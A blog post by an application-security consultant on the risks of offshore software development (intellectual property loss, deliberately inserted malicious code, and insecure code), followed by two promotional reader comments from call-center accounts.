Risks of Offshoring

I have been looking at a number of security issues related to offshore development as of late.  Basically then tend to fall in a few broad categories:

  1. Intellectual Property drain – I have heard it said: “If you want to keep a secret – don’t tell nobody”  Well, sending specs for business-critical software overseas to be implemented in a foreign country with a radically different legal system and cultural appreciation for intellectual property probably qualifies as “telling somebody.”  This was less of an issue when the work going overseas was Y2K COBOL maintenance, but these days there is really innovative stuff being implemented all around the world the risk is far greater.  Google can give you some recommendations about best practices for offshore development, but at the end of the day moving development offshore drastically increases the risk that the confidentiality of your information will be compromised.
  2. Malicious code – This is the threat that offshore developers intentially insert malicious code into the software that is delivered.  Malicious code could be anything from  time bombs set to go off if future contract negoations do not go well, code that siphons off customers data or even system-level backdoors.  Slashdot had an article today about the US government investigating Lenovo.  This wasn’t specifically offshore software-related, but does speak to concerns about having information technology goods produced offshore.  The “good” news here is that at least organizations have a chance to review the code before it goes into productions (hopefully).  The “bad” news here is that reviewing code to find these sorts of defects is extremely time consuming and requires well trained individuals.  In cases such as this it isn’t a matter of finding technical flaws such as SQL injection or Cross-Site Scripting problems that automated code scanners can find.  This requires a line-by-line search for logical flaws in the application that result in a compromise.  Malicious code in offshore-developed software is especially scary because it brings into question the confidentiality, integrity and availability of any systems brought online based on the code.
  3. Insecure code – If US developers can make mistakes, so can offshore developers.  US-based software development organizations are bad enough at designing and implementing reasonably secure applications.  If offshore organizations are trying to solicit customers primarily based on price, security will be the first concern to go out the window.  In my experience, I have seen this become an issue time and time again when organizations with little in-house technical expertise try to develop software offshore.  They simply don’t know what to ask for.  Even organization that are technically sophisticated do not make this a priority.  If you ask for security you might not get it – if you don’t ask for security you certainly won’t get it.

Offshoring software development can significantly reduce the costs of developing applications.  However, organizations need to take into account the costs of certifying the deliverables that come back as well as the indirect costs from the security risks associated with offshore development.

–Dan
dan _at_ denimgroup.com

About Dan Cornell

A globally recognized application security expert, Dan Cornell holds over 15 years of experience architecting, developing and securing web-based software systems. As the Chief Technology Officer and a Principal at Denim Group, Ltd., he leads the technology team to help Fortune 500 companies and government organizations integrate security throughout the development process. He is also the original creator of ThreadFix, Denim Group's industry leading application vulnerability management platform.
More Posts by Dan Cornell

2 Responses to “Risks of Offshoring”

  1. Call Centers in the Philippines

    An insightful and articulate post! Offshore outsourcing services may continue to be associated with conventional concepts such as cost-savings, but if we analyze properly, we can easily see that the applicability of such concepts has witnessed constant erosion over the past few years. One of the main reasons for that has been the growing awareness that outsourcing services are not just a means to reduce operational costs. And that they play a more important role, i.e. acting as a vital link between businesses and their present and potential customers. This becomes evident when we look at recent customer survey results that clearly indicate that around 70% of customers move over to a new product or service if they are dissatisfied with the customer support services offered by their existing product manufacturer or service provider. -Jaime-

  2. Call Center Philippines

    Thank you for your thoughts; you bring up an interesting point. Companies are outsourcing software development to cheap labor overseas, where there is little or no way to ascertain the security risks posed by offshore workers. One risk is the potential loss of intellectual property and business-process secrets. Offshore outsourcers can copy and sell that knowledge or repackage it and present it to a competitor. Offshoring has the potential to redefine the CIO role from head of IT operations to executive in charge of global delivery of business services. What an auspicious opportunity for cautious CIOs who have the right stuff!

Leave a Reply

Your email address will not be published. Required fields are marked *